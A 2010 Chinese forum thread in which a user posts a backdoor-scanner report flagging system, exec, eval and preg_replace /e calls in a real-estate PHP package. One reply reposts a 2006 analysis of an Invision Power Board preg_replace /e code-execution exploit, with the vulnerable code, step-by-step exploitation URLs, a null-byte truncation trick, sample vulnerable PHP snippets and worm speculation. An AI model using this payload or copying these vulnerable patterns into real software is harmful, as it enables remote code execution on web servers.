E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_addons_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:23:40
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_caches_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:23:46
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_crons_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:23:46
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_request_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:24:04
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_usergroups_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:24:18
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\class\combakfun.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:09
2009-10-26 11:11:58
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\class\config.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:09
2010-3-17 8:48:24
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\class\phpzip.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:09
2008-7-17 14:34:42


包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。

有高手没有,期待修复一下
作者: 滨少    时间: 2010-3-22 12:17
函数preg_replace+/e 漏洞利用

来源:http://www.xfocus.net/articles/200605/866.html
创建时间:2006-05-03
文章属性:原创
文章提交:HeiGe (hack-520_at_163.com)
ipb search.php 漏洞分析及思考
Author:SuperHei_[At]_ph4nt0m.org
Blog:http://superhei.blogbus.com/
Team:http://www.ph4nt0m.org
Data: 2006-04-27
#############
##简单分析###
#############
该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262:
    if ( $this->ipsclass->input['lastdate'] )
        {
            $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1
selected='selected'", $this->output );
            
        }
    }
通过变量input['lastdate']注入/e, $this->output注入shellcode。
#############
##利用方法###
#############
注册一个用户,发个贴 内容[shellcode]如下:[
superheixxxxxxxeval(phpinf0()); //
注意最后的;和//之间有一空格
然后点“Search”--->Search by Keywords:superheixxxxxxxeval [记得选择Show results as posts ]
可以得到searchid
http://127.0.0.1/ipb215/upload/i ... _in=posts&resul
t_type=posts&highlite=superheixxxxxxxeval
然后在后面加一个&lastdate=z|eval.*?%20//)%23e%00 也就是[/e]提交就ok了:
http://127.0.0.1/ipb215/upload/i ... _in=posts&resul
t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00
#############
##分析讨论###
#############
1.

简单分析:
该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262:

    if ( $this->ipsclass->input['lastdate'] )
        {
            $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1

selected='selected'", $this->output );
            
        }
    }

通过变量input['lastdate']注入/e, $this->output注入shellcode。



这个分析,掉了一个重要的细节:preg_replace+/e 里有3个参数,只有第2个参数里的代码才可以执行,但是上面的语句貌似是第3个参数提交

的,其实不然,注意上面preg_replace里的第2个参数:\\1 selected='selected' 里面的\\1 为第一参数里正则表达试匹配后的值。归根结底

我们提交的shellcode还是在第2个参数执行了。

2.
注意最后的;和//之间有一空格

这个又是为什么呢?因为我们提交的lastdate=z|eval.*?%20//)%23e%00里是已空格+//为标志的,所以我们提交的shellcode也要有空格+//

3.preg_replace存在null截断漏洞????
我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞],我们测试下,把上面的漏洞写个简单的模型:
<?
$a=$_GET[a];
echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i ","\\1 ","heigegegxxxxxxxeval(phpinfo());//");
?>
我们直接提交http://127.0.0.1/test2.php?a=2出现错误:
Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3
提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ,但是在很多的web程序里是
经过变量编码和解码在执行的,所以不受gpc的影响,上面的ipb的就可以在gpc=on的情况下截断。
4."lastdate=z|eval.*?%20//)%23e%00"的构造
主要是在this->output里以eval和%20//为标志取\\1 为执行的php代码。
5.worm的利用?
还记得Santy吗?就是利用的phpbb里的一个preg_replace,这里会会被利用呢?ipb这个漏洞的利用必须要登陆,但是在ipb注册时候有“图片
认证”,不过据说这个可以编写程序读出来?? 只要突破这个worm是有可能的,毕竟ipb的用户有那么多......
#############
##总结模型###
#############
1.直接在preg_replace第2个变量执行的模式:
<?
echo preg_replace("/test/e",$h,"jutst test");
?>
提交http://127.0.0.1/test/11/preg.php?h=phpinfo()
实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞
2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式:
<?
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h);
?>
提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]
参考:
r57的exp:http://www.milw0rm.com/exploits/1720
更多资料:http://www.google.com
作者: torsean    时间: 2010-3-22 12:34
这么多,有没有好点的房产程序,想做个房产的
作者: 邯郸    时间: 2010-3-22 13:19
我晕!这么全面的检查,这么不堪一击的程序……
作者: jiaao    时间: 2010-3-23 00:53
一个一个吗慢慢补吧!
作者: mimihoho    时间: 2010-3-23 15:23
看着头就晕
作者: yyf365    时间: 2010-3-24 17:29
我想知道你用啥测得。挺全面,类似PMD代码检查工具了
作者: kingfeng    时间: 2010-4-7 00:08
呵呵。。问题还真多的。。。慢慢补吧
作者: scg16    时间: 2010-4-23 00:45
额,有人能搞到官方出的开源的,非房客的不?
作者: 6805711    时间: 2010-4-23 01:26
照这样检测。还有安全的代码吗?
作者: huihui51    时间: 2010-4-23 04:10
不错,看看




欢迎光临 源码论坛,商业源码下载,尽在锦尚中国商业源码论坛 (https://bbs.52jscn.com/) Powered by Discuz! X3.3